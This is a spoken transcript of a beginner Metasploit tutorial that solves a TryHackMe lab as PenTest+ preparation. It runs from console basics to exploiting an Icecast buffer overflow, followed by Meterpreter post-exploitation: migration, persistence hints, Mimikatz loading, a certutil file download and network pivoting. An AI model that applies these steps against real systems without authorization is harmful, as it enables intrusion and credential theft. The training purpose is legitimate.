What's going on and welcome back. In today's video, we're gonna go over Metasploit, the basic use of Metasploit. Of course, for beginners and for starters. So this video assumes you have zero knowledge or advanced knowledge, but you don't have to have an advanced knowledge. It's okay to have a zero knowledge and to start watching this video. So basically, first, we're gonna go over Metasploit applied on a machine from TryHackMe to understand the use and fundamentals of its switches, commands, modules, whatever. So the first thing we do all the time when we want to initialize Metasploit for the first time, we type sudo msf initialize to initialize the database, msf dp init. So first we initialize the database. We're going to do this, right, if you are starting Metasploit for the first time. If you have it already, you're not going to need to do this all the time. Okay, so it's only for first use. After that, of course, we will run MSF console. So I'm going to hit a new tab, or split, or hit new tab. It's better. Okay, so here MSF console. And of course, if you want to see all of the available, want to see the help menu, type -H. Okay, and here we see all of the options available to use with MSF console. For example, if you want to check the version of MSF console, we type MSF console-v, and we get an output displaying the version of Metasploit. So it is 6.0.15. All right. Now the next thing is how to start Metasploit. Of course, all of you know that. So clear MSF console. All right. So once Metasploit has started, the next thing is to check the status of the database. db status displays whether Metasploit is connected. So connected to MSF, connection type PostgreSQL, which means that Metasploit uses PostgreSQL database. All right. Okay, let's go now to TryHackMe and answer the questions. The first thing here, the startup instructions. Next, we have this. This is -Q, by the way. Ignore this. Now, completed. Here, cool. We have connected to the database. Which type of database does Metasploit 5 use? It's PostgreSQL. Okay. And if you remember now, Metasploit is part, this video is part of COMPTIA Pentest Plus preparation. Okay. Now, let's get started with the Metasploit commands. Now, once we are here, we type help. We see a list of the available commands. As you can see here, all of the modules, commands, how to use them, what are the available switches. As you can see, here are the core commands, exit, features, debug, connect, module commands like the set, use, show options. You can find them here. The jobs command, once you have received a session from your target, from a remote target, you can just use these commands to view the active jobs, active sessions, kill sessions, rename job, and database commands. All right, let's see here, what do we have? So it's completed. The help menu has a very short one-character alias. What is it? It is the question mark. Now, if you try this, you type question mark, you will get the same output we got when we have typed help. So it's kind of shortcuts. Okay, let's get back there. Finding various modules we have at our disposal within Metasploit is one of the most common commands we will leverage. in the framework, what is the base command we use for searching, right? So if you go back here, if you want to search for a module payload exploit, we type search, and there are certain parameters we specify, like the name, the type. We're going to talk about this later, but for starters, we can type search, and next we can type the thing we're looking for. For example, search SQL. It's going to list everything where the SQL string is mentioned, modules, whether the model is exploits, post-exploitation, auxiliary, scanner, payloads, whatever. So the answer to this is search. Once we have found the module we want to leverage, what command we use to select it as the active module? So as all of you know, for example, if we want to use this module, I want to use this, right? So all we have to do is to copy that, copy, and type use, paste, enter, and we are inside the module. So the answer to this question is use. Okay, how about if we want to view the information about either a specific module or just the active one we have selected? So for example, I want to see what does this module do? How it can help me? All I have to do is to use the module, all right? And once inside the module, I can type info to display info about this module. For example, here's the description about the module, the name, the module. So you can see how the module, or if the module will help you in your scenario. Available actions, the options required, the description. So the answer here is info. Metasploit has a built-in netcat-like function where we can make a quick connection with the host simply to verify that we can talk to it. What command is this? So I guess it's connect. So if we type here previous, no, okay, connect, Google. So we have some, yeah, so we can use connect, specify the port and the source address. Okay, I'm not gonna confuse you with this now, but the command is connect. The question here, the answer is connect. It's like netcat to connect with the host. Connect. Entirely one of the commands purely utilized for fun. What command displays the MOTD ASCII art we see when we start MSF console? Entirely one of the commands purely utilized for fun. What command displays the MOTD ASCII art we see when we start? It is the banner, I guess. So if you type banner, we get this banner. I'm not sure if we can use this for the exam, but type banner. We will revisit these next two commands shortly. However, they are two of the most used commands within Metasploit. First, what command do we use to change the value of a variable? Well, let me explain this. So we are here, info. So these are the variables, okay? And these are the existing values. So for example, count has the value of 1, proxies has a blank value, our host has a blank value. So if I am now actively involved in an engagement and I want to change the value of the target, our host, so we use set command, our host, and the IP 192.168, etc. This is not my concern now. The command is set to change the variables. We type set, the variable name, and the value. So the answer is set. Metasploit supports the use of global variables, something which is incredibly useful when you are specifically focusing on a single box. What command changes the value of a variable globally? Well, you're not going to use that more frequently, but the command is set g. Now that we have learned how to change the value of variables, how do we view them? How do we view the variables? There are technically several answers to this question. However, I'm looking for a specific three-letter command which is used to view the value of single variables. All right, let me explain this. So basically here, suppose that you have used set to set the values of these variables. And if you want to view the values of these variables, you can type show options. Show options will display the variables and their values. What about getting the value of a single variable like this one? I don't want to display the values of all of the variables. All I want to is to display the value of the single variable. So I use get rhosts. This displays me the value of this variable only. Okay, the answer here is get. How about changing the value of a variable to null, no value? Okay, so it's the opposite of set. So if set rhost gives value like 192.168.1.1 the rhost variable, if I want to delete this value, all I have to do is do this, unset. Unset will remove this value from this variable. Okay, that's it. Either to a blank or to a different value. Unset. When performing a penetration test, it's quite common to record your screen either for further review or for providing evidence of any actions taken. This is often coupled with the collection of console outputs to a file, as it can be incredibly useful to grep for different pieces of information. Output to the screen. What command can we use to set our console output to save to a file? Well, it is spool. We're going to use that later. Leaving a Metasploit console running isn't always convenient and can be helpful to have all of our previously set values load when starting up Metasploit. So what command can we use to store the settings active data stores from Metasploit to a settings file? This will save. Okay, so you can use the command save. The last two commands, we're not gonna go over them in this scenario. We're gonna just go over what is important for testing. Okay, so now we're gonna jump to modules. So basically here, let's see the questions and explain the answer of every question before we answer it. So easily the most common module utilized, which module holds all of the exploit code we will use. So what does this mean is, if we want to reference for the exploit modules, we have exploit modules, we have payload modules, we have auxiliary modules for scanning. The exploit modules are all categorized under exploit. Okay, so the answer to this is exploit. Here, used hand in hand with exploits, which module contains the various bits of shellcode we sent to have executed the following exploitation. So all in all, you know guys, exploit, and the exploit to be delivered, it needs a payload. So the answer to this is payload. Of course, we have modules for exploits, modules for payloads, and of course, auxiliary. Which module is most commonly used in scanning and verification? Machines are exploitable. This is not the same as the actual exploitation. Of course, the scanning modules, all of you know them. They are referred to by auxiliary. One of the most common activities after exploitation is looting and pivoting. Which model provides these capabilities? You know, we have exploit, payload, auxiliary. So we have scanned the target with auxiliary modules. We have prepared our payload and the payload, and then we have prepared the exploit. After we have exploited the target, we want to do post-exploitation. So post-exploitation modules are referred in Metasploit as post. So post. Right. Commonly utilized in payload obfuscation, which module allows us to modify the appearance of our exploit such that we may avoid signature detection, right? So for this, we use something called encoders. So basically, when we generate, let's go back to, for example, when we generate, you can type here encoders or, yep, encoders. Oh, I'm inside Metasploit. Okay, so we type back. All right. So here I can, for example, type search, type or search encoders, encoder. So as you can see, these encoders are used to change the, yeah, everything that starts with encoder, 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 encoder. Let's take an example. Encoder x64 XOR. We type use, paste. So info. So this one, as you can see, an x64 XOR encoder uses an 8-byte key and takes advantage of x64 relative addressing. So what does this mean? We use x64 encoder to encode a payload we have, right? And most probably you're going to use these modules when you want to generate a payload with MSF Venom. So we choose one of these encoders, right? x64 XOR or Shikata x68. Okay, that's about encoders. Last but not least, which model is used with buffer overflow and ROP attacks? Okay, if we type here back search NOP, so these models are used with buffer overflow. For example, use to get info about one of them. No refers to no operation, means do nothing. Info. So this is single byte NOP generator. We type run. Oh, yeah, so this one can't be used like that. Just the description of this, it's no single NOP generator. And of course, we can, as you can see, it's saying, for example, you can interact with a module by name or index. We can use the numbers instead of copying or pasting the full name. So here we type NOP to use with buffer overflows. Last, not every module is loaded in by default. What command can we use to load different modules? So it is load, self-explanatory. If you want, you can hit the hint and you can see explanation. This can be found with the MSF console help command. Okay, now the last 3 tasks are practical. We're going to deploy a vulnerable machine and apply what we have learned. So let's type back now. And now we will start scanning the target. We will start practically using Metasploit. So the first thing, we will start from the perspective of cyber kill chain. The first thing we do, we got the IP of the target. The next thing is to start scanning it. The first thing we can try is using nmap with Metasploit. How do we do that? We type db nmap, and then we type -sv the IP address, and you scan. Now, Metasploit will use nmap to scan the target and store the results in the database of Metasploit. So then we can use the available commands of Metasploit to interact with the results. So these are the nmap scanning results. As you can see, we have a couple of open ports, 135, 139, 445, all the way down. Okay, now these are the open ports. Now, what if we want to display the services or the hosts we have scanned? We can type hosts, and we can see here The only host we have scanned is this IP address. We can type services. If you running services, we have these services, right? And their corresponding ports. I know this is not a comprehensive nmap scan, but we can customize the scan with the available switches. So you can use all nmap switches with Metasploit. You're not constrained or you are not bound to use only SV. This is only an example. Let's answer the questions. So the first one is done. What service does nmap identify running on port 135? 135, it is MSR PC. Let's go ahead and see what info we have collected in the database. Try typing the command hosts. We type this. We did this as well. One last thing to try the command vulnerabilities. Okay, so this is a scan for vulnerabilities, I guess. No vulnerabilities so far. Actually, if you want to scan for vulnerabilities, it's better to type or use the command -sv --script vuln. This will scan for vulnerabilities using the nmap scripting engine. All right. Now that we have scanned our victim system, let's try connecting to it with Metasploit payload. Metasploit 5 used by unique icecast. Let's cancel the scan. Type search icecast. So this is the answer. This is for interacting with the target, by the way. So we can type this and see if that is correct. Yep. Okay, now the rest of the sections are for creating a payload. Let's do that without answering the questions, and we can then jump back to look for the answers. So why this exploit? Let's type info, or let's type first, we can type info without jumping inside the exploit, and we can see why we will use this exploit. Paste. So this model exploits a buffer overflow in the header parsing of Icecast versions 2.0.1 and earlier, discovered by the Luigi Arima. Sending 32 HTTP headers will cause a write one past the end of a pointer array, one on win32. This happens to overwrite. Okay, this is buffer overflow vulnerability, by the way. And here, all you have to do is to set our hosts. Let's check if 80,000 is open. Let's go up. 80,000 is open indeed here. And the service is Icecast Streaming Media Server. So the walkthrough of TryHackMe suggested we use this exploit directly. It is suggesting that this service is vulnerable. That's why it has pointed us to use this exploit. Okay, so this is a practical scenario. Let's take the exploit here and see what are the required variables. So we have our port is already set, our hosts. So we type, or first we type use to jump to the exploit, 0. All right, show options one more time. Our hosts, okay, set our hosts. Of course, our host is the IP of the target. Paste. And our port is or has been already set. Now, next thing is we look at our variables or the variables connected to our local system. So the listening port is, as you can see, 44s, and the lhost is our IP. But for the purpose of this scenario, we're going to need to set the lhost to the IP address of our VPN connection. So here we want to know the IP address of the adapter connected to the VPN. So this is the IP. We take this, set lhost. All right. Now, before we run this, okay, or let's try run this before run. Okay, so when we have run this, as you can see, we received the first Meterpreter session. So we have compromised the machine. getUID, and these are Meterpreter commands, by the way. They are somewhat separated from Metasploit. I know Meterpreter is part of Metasploit, but the commands are different because Meterpreter is used once you gain access. Okay, so getUID is used to retrieve the ID of the user that you have just compromised. So you are dark PC. Let's jump now to the questions and answer them. Okay, so what's the name of the column on the far left side of the console that shows up next to name? I'm going to leave that because we haven't gone through this. Okay, now type the command, use number from the previous. Okay, now let's set the payload using this command. Well, here they have used the Meterpreter, or they have used multi-handler. So we're going to skip this. Okay, you can skip this section if you have done it this way. You can, of course, set the required parameters all the way till here. Okay, and you leave these two options. You use multi-handler to set the listener settings or variables. Okay, done for now. Next. Now here, once we have gained access, what we're going to do? Okay, let's interact with the target. So once we are in, okay, after we have got the current user, getUID, we can also type help to see what are the available interpreter commands we can use against the targets. Okay, so for basic use, we can check for the ID. We can check also the running processes. We can use PS to check the running processes on the remote system. As you can see, these are the processes, the PID. And of course, if you want to migrate to one process, all you have to do is to type migrate and then the ID of the process. Why do you want to migrate? Okay, migration of the process enables you to have a more stable shell. In case the current shell or the current session dies, there will be another process that will take place for your session to stay alive. Of course, we use migrate as well to extend the life of the current session in case the computer has disconnected for some reason. Our shell or our session will be kept in another process or in another running process. Now, if the process is not set to start with the system or with the boot up, you're gonna lose your session eventually when the target shuts down. That's why it's also recommended not only to migrate your process or to another process, it's also recommended as well to store your what was the name? Your shell in the registry keys. So that it starts with the boot up. This is about persistence, by the way. Okay, now we can migrate to, in the scenario of TryHackMe, it's asking to migrate to the service. Let's go up, see what service. Full service for the printer. This one. So we can type the PID 1260, and it's saying cannot migrate into this process. Insufficient privileges. This is quite common if you don't have system privileges. So you gotta keep try unless you find an appropriate process to migrate to. But most of the time, before establishing the session, we can use, let me exit from here. Exit. Okay, show options. Right. So in order to migrate automatically without just hassling which process you are allowed to migrate into, you can just type set auto run script post Windows manage migrate. This will auto migrate the process into another process once you gain access. Run or exploit. So now it should migrate. As you can see, it is auto migrating into Notepad. All right. Now, what if we want to get system info? We type sys info. We can see we are doing Windows 7 x64, not domain controller, service pack 1 6.1. These are vital information if you want to exploit the target with a vulnerability that matches the current version of the system. What if you want to load Mimikatz? We type load kiwi. This will load Mimikatz. So as you can see, Mimikatz has been loaded. So I can type get privs. I can get the current privileges of the user, which is dark PC. Sometimes it's very important to list the privileges of the current user, as it may happen that you will exploit or elevate your privileges through one of these permissions or privileges. Okay, now what about uploading files to the target? So before that, you want to see where you are. So we are in C program files, icecast 132. Let's say, for example, we want to upload a file to the target. Let's say you go to desktop and touch test. So test is here. I can now try to upload test, upload test, no such file or directory. Let's use the full path. Access denied, so which means that we don't have permissions, as I understand, to write to this directory. In this case, you want to use shell and then cd out of this directory. Can you do that? Yes, we can. dir cd users, dir cd dark, dir cd desktop. Okay, now we are in desktop, and most definitely we can upload to this directory. Okay, so now we exit the shell, back to interpreter, pwd, and still we are in, let me try if I can see the desktop from interpreter without the need to use the shell every time. Nope. I can't use it, I guess. Yeah. All right. So we drop back to shell. And we can use a tool called cert util to download this, but that's not within the purpose of our scenario. Right? But to upload files to the interpreter, you can use the upload command. If you failed, you can use cert util -url cache -f http, and here you type your IP address. Assumingly, the IP address here is your IP that acts as, or that hosts, a web server, and inside this web server lies your target file. So the IP is, for example, let's see our IP address. $8,000 test.txt, and the output file test.txt. Before I take enter, we're going to copy that, delete, and we're going to need to head back to desktop. cd back, cd back, cd users, dark, paste. So now, we need first to start the server. So sudo Python 3-m HTTP server. This will start a web server on this directory. So make sure if you want to download files to the remote host, make sure your files are hosted within the directory from which you are running this command. So in our case, it's desktop. So here, we're going to repeat the command again because the server wasn't running. So as you can see, the file has been downloaded there, and the file is here. Okay. Now, what if we want to view the network configuration? This will be very useful if you want to find out if the current target is connected to other networks, which you might need to enumerate or test. This is very common if you are testing corporate network. You might be testing a public server, and then you find out that this public server is connected to an internal network. So how do you find this? You can type ifconfig, and you can find all of the network adapters the target is connected to. For example, we see here the local host, that's fine, this is fine, this is fine, this is fine. What about this? Well, this is the current network. Okay, so in this case, the current target is not connected to other networks. Okay. One of the commands we use to find out if the target we are scanning or we are testing is an actual virtual machine, we can then use background to move out temporarily of Meterpreter into Metasploit in order to harness and use the modules. We'll type use post Windows gather check VM. This module will check if the machine you have just compromised is an actual or running on a virtual machine or not. So type show options, of course, and the required is session. The session is the variable that holds the session you have just compromised. So this is session 2, by the way, and we type set session 2. Run. So we're checking if dark PC is a virtual machine. This is a Zen virtual machine, indeed. Now, what if we want to find the exploits, right? We want to see if the target is vulnerable. One of the tools, of course, I explained many times in the while I solve the hack the box machines from Vulnerable Hub or even TryHackMe, we use many tools like Windows Exploit Suggester, Sherlock, PowerShell Empire, Local Suggester. In Metasploit, there is a module we can use to check on the available exploits or the possible exploits you can use against a target. So it's post multi-reckon local exploit suggester. Enter, show options, see what's required for this to run. The only required variable is session, which we already have. Set session 2, and we run. Here it's going to collect the possible exploits that we can use against the target to elevate our privileges. Okay, as you can see, Metasploit has displayed the possible exploits we can use along with their module. So you can directly copy paste, put the required parameters, and elevate your privileges. Very easy. All right, let's talk now about, or let's jump back to TryHackMe and see the questions. So here we have, first thing first, here it's asking for the command used for running the processes, which is ps. Let's go ahead and move. Oh, correct answer, not correct answer. What is the command used for running the processes? It's ps. What's the name of the spool service? It was spool sv.exe. Let's go ahead and move into the spool process, or at least attempt to. This won't work. Here it's asking for the command used for migration, so it is migrate. Well, that migration didn't work, I know. Let's find out some more info about the system we can try to elevate. So here it's asking for the command used for getting the user ID. Get UID sysinfo, and here load kiwi for mimikatz. Figure out the privileges, get privs. We have covered all of these actually. What command do we want to transfer files? Upload. What if we want to run a Metasploit module? Yeah, run. Simple question, but still quite necessary. What command do we run to figure out the networking info? ipconfig for Windows, ifconfig for Linux. We have done all these, completed. One extra question, what command can we run in our Meterpreter session to spawn a normal system shell? You know the answer, we have done this, shell. Right, the last section is about pivoting. So let's go over these. And here it's asking, let's go ahead and run the command run autoroute -h. This will pull up the help menu for autoroute. What command do we run to add a route to the following network? Use the -n flag. Why this, by the way? So basically, when you type ifconfig here, for example, ifconfig in Meterpreter, and you find that there is a network, right, connected to the target. For example, in my case, I have my local IP, and I'm connected to the VPN network. What if you want to reach this network? All you have to do is to type autoroute, the autoroute module in Metasploit. You can type run autoroute-h, and here you type the network IP address, right? The network IP is this one. And of course, if you want to specify the subnet mask, -n 255.255.255.0. This will add you, or will add a route between your local machine, right, and this network, which is connected to the target you have just compromised. I hope this is clear. Okay, next one. Additionally, we can start a SOX for a proxy server out of this session. Background our current Meterpreter session and run the command search server SOX4A. What's the full path of the SOX4A auxiliary module? Why do we use SOX4A? So basically, if we don't want to use the autoroute, we can start a proxy server on Metasploit and configure proxy chains to use that. So what do I mean by this? For example, we want to reach this network, right? We can go back to Metasploit and type use what? Depreciated? Set or search type name SOX4A. Okay, this is the up-to-date module, by the way. So type use, and again we get this. Right, okay, I didn't see this. Right, so we can use this one, the server SOX proxy. And set version to be 4A, and we can run it. Once this is run, all you have to do is to go to the proxy chains. So cat etc proxy chains.conf. All right, nano. modify on it, and you go down, you see an entry for SOX4A. Make sure the IP and the port matches the one here. So once it starts, it's going to spill out the IP and ports. You add them here, and then you're going to start enumerating the target with the proxy change command. And by the way, most of the time, if you want to reach networks or if you want to do pivoting, you can use the auto route, works effectively in Metasploit, or you can use SSH tunneling, or you can use port forwarding. We have demonstrated this in the past videos. You can go and watch them over. Okay, that's was for Metasploit today. I hope this is clear. And this was an introduction, fundamental principles about Metasploit to use this in your engagements. And of course, this video is part of COMPTIA Pentest Plus preparation by TryHackMe. See you in the next video.